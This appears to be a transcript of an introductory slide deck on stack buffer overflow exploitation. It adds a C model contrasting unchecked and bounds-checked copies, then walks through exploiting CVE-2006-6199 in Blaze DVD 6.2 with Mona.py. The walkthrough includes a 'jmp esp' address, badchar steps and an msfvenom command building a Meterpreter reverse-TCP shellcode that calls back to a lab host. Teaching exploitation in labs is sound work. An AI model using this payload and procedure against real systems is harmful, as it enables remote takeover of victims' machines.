exploiting 101

Upload: ackcent

Post on 13-Apr-2017

§ Exploiting: The art of taking advantage of software vulnerabilities.

− Stack Buffer Overflow

  § Integer Overflow

  § Off-by-one

− Heap Overflow

  § Use after free

  § Double Free

− Memory Leaks

  § Format String

− General Purpose: EAX, EBX, ECX, EDX

− Instruction Pointer: EIP

− Frame Pointer: EBP

− Stack Pointer: ESP

Figure: stack layout before the copy (High Address at the top, Low Address at the bottom).

  Main stack frame
    Main Parameters
    Saved EIP
    Saved EBP
    P1 (4 bytes)
    P2 (16 bytes)

  CopyData stack frame
    source (4 bytes)
    dest (4 bytes)
    Saved EIP
    Saved EBP
    EBP, ESP

§ Intel AT&T

§ FastCall

− Uses ECX and EDX to pass arguments (from left to right).

− The rest of them go through the stack (from right to left).

§ Cdecl

− Arguments are passed on the stack (from right to left).

− Used by C and C++.

− EAX, ECX, and EDX are caller-saved.

− The rest are callee-saved.

− The callee removes arguments from the frame.

§ StdCall

− Callee is responsible for cleaning up the stack.

− Parameters are pushed onto the stack in right-to-left order.

− Used by Win32 API calls.

Figure: the same stack layout after the overflow (High Address at the top, Low Address at the bottom). The P1 slot now reads Modified (4 bytes); everything else is unchanged.

  Main stack frame
    Main Parameters
    Saved EIP
    Saved EBP
    Modified (4 bytes)
    P2 (16 bytes)

  CopyData stack frame
    source (4 bytes)
    dest (4 bytes)
    Saved EIP
    Saved EBP
    EBP, ESP

Blaze DVD 6.2 (latest version): http://www.blazevideo.com/dvd-player/

CVE-2006-6199: file-format vulnerability with RCE via a stack overflow. http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6199

§ ASLR

§ DEP

§ Stack-cookie
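The two stack-frame figures above (P2 as the 16-byte destination, P1 the 4-byte neighbour that ends up Modified, saved EBP/EIP beyond it) and the stack-cookie mitigation listed here can be reproduced in a small model. The C program below is an added example, not code from the slides or from Blaze DVD: it models the frame as a flat byte array so the overrun is well-defined and nothing actually crashes, places the slide's unchecked CopyData next to a length-checked version, and shows where a stack cookie would catch the overwrite. The offsets, the cookie value 0xdeadbeef, the initial P1 value 0x41414141 and the 'B'-filled input are all constructed for the demonstration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from the slides: a byte-array model of the frame
 * drawn in the two figures, with a stack cookie added for the mitigation
 * slide. Real stack memory is never overrun; the frame is a flat array so the
 * overflow is well-defined and can be inspected instead of crashing.
 *
 * Layout, low address -> high address (the figures grow the same way):
 *   [0..15]  P2      16-byte destination buffer written by CopyData
 *   [16..19] P1      4-byte neighbour, the slot the figure marks "Modified"
 *   [20..23] COOKIE  stack cookie sitting between locals and saved EBP/EIP
 */
#define P2_SIZE     16
#define P1_SIZE     4
#define COOKIE_SIZE 4
#define FRAME_SIZE  (P2_SIZE + P1_SIZE + COOKIE_SIZE)
#define P1_OFF      P2_SIZE
#define COOKIE_OFF  (P2_SIZE + P1_SIZE)

/* Constructed values for the demonstration. */
static const uint8_t P1_INITIAL[P1_SIZE] = {0x41, 0x41, 0x41, 0x41};
static const uint8_t COOKIE[COOKIE_SIZE] = {0xde, 0xad, 0xbe, 0xef};

typedef struct {
    int accepted;      /* 1 if the copy was performed, 0 if rejected */
    size_t spilled;    /* bytes written past the end of P2 */
    int p1_intact;     /* 1 if P1 still holds its original bytes */
    int cookie_intact; /* 1 if the cookie check before return would pass */
} copy_result;

/* Fresh frame: P2 zeroed, P1 set, cookie in place. */
void frame_init(uint8_t frame[FRAME_SIZE]) {
    memset(frame, 0, FRAME_SIZE);
    memcpy(frame + P1_OFF, P1_INITIAL, P1_SIZE);
    memcpy(frame + COOKIE_OFF, COOKIE, COOKIE_SIZE);
}

/* CopyData as drawn on the slide: no bound on the copy, so anything past
 * 16 bytes lands in P1 and then in the cookie. Returns bytes written past P2. */
size_t copy_data_unchecked(uint8_t frame[FRAME_SIZE], const uint8_t *src, size_t len) {
    if (len > FRAME_SIZE) len = FRAME_SIZE;   /* keeps the model itself in bounds */
    memcpy(frame, src, len);
    return len > P2_SIZE ? len - P2_SIZE : 0;
}

/* Hardened form: the destination size is part of the contract, and a source
 * that does not fit is rejected before a single byte is written. */
int copy_data_checked(uint8_t frame[FRAME_SIZE], const uint8_t *src, size_t len) {
    if (len > P2_SIZE) return -1;
    memcpy(frame, src, len);
    return 0;
}

int p1_intact(const uint8_t frame[FRAME_SIZE]) {
    return memcmp(frame + P1_OFF, P1_INITIAL, P1_SIZE) == 0;
}

/* What the compiler-inserted stack-cookie check does in the function epilogue. */
int cookie_intact(const uint8_t frame[FRAME_SIZE]) {
    return memcmp(frame + COOKIE_OFF, COOKIE, COOKIE_SIZE) == 0;
}

/* Copy len bytes of 'B' (constructed input) into a fresh frame with either
 * the unchecked or the checked CopyData, and report the state afterwards. */
copy_result run_copy(size_t len, int checked) {
    uint8_t frame[FRAME_SIZE];
    uint8_t input[FRAME_SIZE];
    copy_result r;
    if (len > FRAME_SIZE) len = FRAME_SIZE;
    memset(input, 'B', sizeof input);
    frame_init(frame);
    if (checked) {
        r.accepted = copy_data_checked(frame, input, len) == 0;
        r.spilled = 0;
    } else {
        r.spilled = copy_data_unchecked(frame, input, len);
        r.accepted = 1;
    }
    r.p1_intact = p1_intact(frame);
    r.cookie_intact = cookie_intact(frame);
    return r;
}

int main(void) {
    static const size_t lens[] = {8, 20, 24};  /* fits, clobbers P1, clobbers cookie */
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++) {
        copy_result u = run_copy(lens[i], 0);
        copy_result c = run_copy(lens[i], 1);
        printf("%2zu bytes | unchecked: spilled=%zu P1 intact=%d cookie intact=%d | "
               "checked: accepted=%d P1 intact=%d\n",
               lens[i], u.spilled, u.p1_intact, u.cookie_intact, c.accepted, c.p1_intact);
    }
    return 0;
}
```

Build with any C99 compiler (for example `cc -std=c99 frame_model.c`) and run it: 20 bytes silently overwrite P1 under the unchecked copy while the cookie is still intact, 24 bytes reach the cookie, and the checked copy rejects both before writing anything. The 20-byte case is the one to notice: a stack cookie only guards what sits above it (saved EBP/EIP), so the corrupted neighbour P1 goes unreported, which is why the bounds check, not the cookie, is the actual fix and the cookie is only a safety net.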

Mona.py

!mona config -set workingfolder C:\Documents and Settings\test\Escritorio\Mona_results

Immunity Debugger

Metasploit

Mona.py

Log data, item 21
Address=7C874413
Message= 0x7c874413 : "jmp esp" | {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5781 (C:\WINDOWS\system32\kernel32.dll)

Memory info: https://msdn.microsoft.com/es-es/library/windows/desktop/aa366786(v=vs.85).aspx

./msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=172.16.192.1 LPORT=4444 -b '\x00\x0a\x1a' -f perl -o ~/Exploiting/Blaze\ DVD\ Example/shellcode_perl.pl

Badchars: Every byte that could break the shellcode.

With Mona.py:

1. Obtain a badchar array: !mona bytearray -b '\x00'

2. Execute the exploit with the array as the shellcode.

3. Compare memory: !mona compare -f C:\Documents and Settings\test\Escritorio\Mona_results\bytearray

Trash_1

• Separating ESP from the shellcode.

• SUB ESP,20 = \x83\xec\x14

With Radare

Figure: payload layout on the stack, drawn between Low Address and High Address, with the regions labelled Trash_1, EIP, ESP - 20, Trash_2 and Shellcode.

Executing Code with Metasploit

Woot!
